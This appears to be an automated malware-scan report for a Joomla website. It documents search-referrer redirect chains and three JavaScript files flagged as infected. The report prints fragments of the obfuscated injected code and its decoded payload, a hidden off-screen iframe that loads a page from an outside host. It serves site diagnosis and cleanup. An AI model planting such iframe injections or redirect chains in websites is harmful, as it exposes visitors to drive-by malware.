Malicious/Suspicious Redirects
Request 1 (imitating a visitor arriving from a search engine):
URL: http://www.chiptuner34.ru/
GET / HTTP/1.1
Host: www.chiptuner34.ru
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 16 Aug 2014 17:41:29 GMT
Pragma: no-cache
Location: http://web-redirect.ru/?web
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 16 Aug 2014 17:41:29 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: _cutt_caches_images=1408210889; expires=Sun, 17-Aug-2014 17:41:29 GMT; path=/
Set-Cookie: e4a5be75c345d3b74877af9ac54ab887=qhu0n26k03g9fg9503pt5fb8n6; path=/
Set-Cookie: iamalive=yes;Path=/;
X-Powered-By: PHP/5.2.17

Status: malicious

Request 2 (imitating a visitor arriving from a search engine):
URL: http://web-redirect.ru/?web
GET /?web HTTP/1.1
Host: web-redirect.ru
Referer: http://www.google.com/search?q=redirect+check2

Server response:
HTTP/1.1 302 Found
Cache-Control: max-age=0
Connection: close
Date: Sat, 16 Aug 2014 17:38:22 GMT
Pragma: no-cache
Location: http://starik.ru/components/com_users/1/index.php
Server: nginx/1.0.15
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Thu, 21 Jul 1977 07:30:00 GMT
Last-Modified: Sat, 16 Aug 2014 17:38:22 GMT
X-Powered-By: PHP/5.3.3

Status: suspicious
Scanned pages/files
Request | Server response | Status |
http://www.chiptuner34.ru/ | 200 OK Content-Length: 20852 Content-Type: text/html | clean |
http://www.chiptuner34.ru/components/com_jcomments/js/jcomments-v2.1.js?v=7 | 200 OK Content-Length: 29643 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; }
function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);},
updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}},
go: function(l){window.open(l);return false;} };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:
<iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe>

Antivirus reports:
http://www.chiptuner34.ru/components/com_jcomments/libraries/joomlatune/ajax.js?v=3 | 200 OK Content-Length: 6390 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; }
function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
case 'js': if(data){eval(data);} break;
default: this.error('Unknown command: ' + cmd);break; } }
delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; };
this.error = function(){}; }
var jtajax = new jtAJAX(); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:
<iframe src="http://qwant.mirabilisvoyage.ro/gefewtgfdghrhtrj8.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe>

Antivirus reports:
http://www.chiptuner34.ru/media/system/js/caption.js | 200 OK Content-Length: 4162 Content-Type: application/x-javascript | clean |
http://www.chiptuner34.ru/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 11146 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; }
function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS&
else {if(objCheckbox[0].checked) {var value=objCheckbox[0].value;value=value.replace(/"/g,""");postData[postData.length]=new Array(assCheckbox[i],encodeURIComponent(value));}}}}}} return postData;}}
function jax_iresponse(){jax.processIResponse();}
var jax=new Jax();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:
http://vkontakte.ru/js/api/openapi.js?9 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://www.chiptuner34.ru//yandex.st/share/share.js/ | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
http://www.chiptuner34.ru/test404page.js | 404 Not Found Content-Length: 296 Content-Type: text/html | clean |
http://www.chiptuner34.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 312 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chiptuner34.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://chiptuner34.ru/
Result: chiptuner34.ru is not infected or malware details are not published yet.